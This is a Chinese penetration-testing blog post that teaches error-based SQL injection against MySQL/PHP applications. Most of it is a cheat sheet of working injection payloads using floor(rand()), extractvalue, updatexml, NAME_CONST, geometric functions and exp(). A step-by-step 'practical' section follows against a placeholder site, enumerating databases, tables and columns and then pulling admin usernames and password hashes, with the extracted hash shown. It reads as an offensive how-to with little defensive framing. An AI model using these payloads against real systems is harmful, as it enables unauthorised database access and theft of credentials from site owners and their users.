欢迎来到【血梦博客】 今天是:2020年08月12日 星期三
站长联系QQ:635948183
当前位置: 网站首页> 渗透测试> WEB安全之SQL注入:mysql+php 报错注入

WEB安全之SQL注入:mysql+php 报错注入

作者:血梦 日期:2020-03-18 浏览:118分类: 渗透测试 已提交百度收录

mysql在执行 SQL语句的时 如果语句有错 会返回报错信息,在与php结合使用的时候默认并不会把报错的信息在页面显示出来。

如果要在php显示出来 将在执行语句的时候使用mysql_error() 才可以把错误的信息 显示到页面。

$result=mysql_query("select * from article whereid=$id") or die(mysql_error());

1559815950511820.jpg

1、判断注入

and 1=1
and 1=2

2、爆库


id=info()将会得到当前库的名

FUNCTION target_sys.info does not exist
target_sys 就是当前库的名。


3、一些报错语句


1、通过floor暴错
/*数据库版本*/
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,version(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*简单办法暴库*/
id=info()
/*连接用户*/
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,user(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*连接数据库*/
and(select 1 from(select count(*),concat((select (select (select concat(0x7e,database(),0x7e))) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*暴库*/
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*暴表*/
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,table_name,0x7e) FROM information_schema.tables where table_schema=database() LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*暴字段*/
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,column_name,0x7e) FROM information_schema.columns where table_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
/*暴内容*/
and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
2、ExtractValue(有长度限制,最长32位)
and extractvalue(1, concat(0x7e, (select @@version),0x7e))
and extractvalue(1, concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)))
3、UpdateXml(有长度限制,最长32位)
and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)
and updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)
4、NAME_CONST(适用于低版本)
and+1=(select+*+from+(select+NAME_CONST(version(),1),NAME_CONST(version(),1))+as+x)--
5、Error based Double Query Injection (http://www.vaibs.in/error-based-double-query-injection/)
/*数据库版本*/
or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1

还有一些报错语句


floor()
select * from test where id=1 and (select 1 from (select count(*),concat(user(),floor(rand(0)*2))x from information_schema.tables group by x)a);

2.extractvalue()

select * from test where id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)));

3.updatexml()
select * from test where id=1 and (updatexml(1,concat(0x7e,(select user()),0x7e),1));
4.geometrycollection()
select * from test where id=1 and geometrycollection((select * from(select * from(select user())a)b));
5.multipoint()

select * from test where id=1 and multipoint((select * from(select * from(select user())a)b));

6.polygon()

select * from test where id=1 and polygon((select * from(select * from(select user())a)b));

7.multipolygon()

select * from test where id=1 and multipolygon((select * from(select * from(select user())a)b));

8.linestring()

select * from test where id=1 and linestring((select * from(select * from(select user())a)b));

9.multilinestring()

select * from test where id=1 and multilinestring((select * from(select * from(select user())a)b));

10.exp()

select * from test where id=1 and exp(~(select * from(select user())a));

4、实战报错注入


当前用户名


http://target_sys.com/mysqlinj.php?id=1 and (extractvalue(1,concat(0x7e,(select user()),0x7e)))


root密码

http://target_sys.com/mysqlinj.php?id=1 and (extractvalue(1,concat(0x7e,(select password from mysql.user),0x7e)))


查询库

http://target_sys.com/mysqlinj.php?id=-1and(select 1 from(select count(*),concat((select (select (SELECT distinctconcat(0x7e,schema_name,0x7e) FROM information_schema.schemata LIMIT 0,1)) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x frominformation_schema.tables group by x)a)


查询第二个库

http://target_sys.com/mysqlinj.php?id=1 and(select 1 from(selectcount(*),concat((select (select (SELECT distinct concat(0x7e,schema_name,0x7e)FROM information_schema.schemata LIMIT 1,1)) from information_schema.tableslimit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)


把 ROM information_schema.schemata LIMIT 1,1)这个部分的 1 一直往后推也可以得到所有库的名
target_sys
查询表

http://target_sys.com/mysqlinj.php?id=-1and(select 1 from(select count(*),concat((select (select (SELECT distinctconcat(0x7e,table_name,0x7e) FROM information_schema.tables wheretable_schema=database() LIMIT 0,1)) from information_schema.tables limit0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)


第二个表

http://target_sys.com/mysqlinj.php?id=-1and(select 1 from(select count(*),concat((select (select (SELECT distinctconcat(0x7e,table_name,0x7e) FROM information_schema.tables wheretable_schema=database() LIMIT 1,1)) from information_schema.tables limit0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)


查询字段
查询 admin的表 首先把admin 转换成十六进制再放到语句去

http://target_sys.com/mysqlinj.php?id=-1and(select 1 from(select count(*),concat((select (select (SELECT distinctconcat(0x7e,column_name,0x7e) FROM information_schema.columns wheretable_name=0x61646D696E LIMIT 0,1)) from information_schema.tables limit0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)


查询第二个字段 0x61646D696E LIMIT 0,1 这个0 往后推

http://target_sys.com/mysqlinj.php?id=-1and(select 1 from(select count(*),concat((select (select (SELECT distinctconcat(0x7e,column_name,0x7e) FROM information_schema.columns wheretable_name=0x61646D696E LIMIT 1,1)) from information_schema.tables limit0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)


查询数据

http://target_sys.com/mysqlinj.php?id=-1and(select 1 from(select count(*),concat((select (select (SELECT distinctconcat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1)) frominformation_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tablesgroup by x)a)


updatexml方法查询数据

http://target_sys.com/mysqlinj.php?id=-1and updatexml(1,concat(0x7e,(SELECT distinctconcat(0x23,username,0x3a,password,0x23) FROM admin limit 0,1),0x7e),1)

上面这种查询 只能查询32位 所以有些部分查询不出来。可以先查询密文 或者先查询长度的 再进行字符长度的截取。

http://target_sys.com/mysqlinj.php?id=-1and updatexml(1,concat(0x7e,(SELECT distinctLENGTH(concat(0x23,username,0x3a,password,0x23)) FROM admin limit 0,1),0x7e),1)

LENGTH 函数 查询的长度为40

SUBSTRING()字符串截取函数

查询 1-32

http://target_sys.com/mysqlinj.php?id=-1and updatexml(1,concat(0x7e,(SELECT distinctSUBSTRING(concat(0x23,username,0x3a,password,0x23),1,32) FROM admin limit0,1),0x7e),1)



admin:e10adc3949ba59abbe56e057
查询32-40 f20f883e

http://target_sys.com/mysqlinj.php?id=-1and updatexml(1,concat(0x7e,(SELECT distinctSUBSTRING(concat(0x23,username,0x3a,password,0x23),33,40) FROM admin limit0,1),0x7e),1)
admin:e10adc3949ba59abbe56e057f20f883e

1559816008416977.jpg

关灯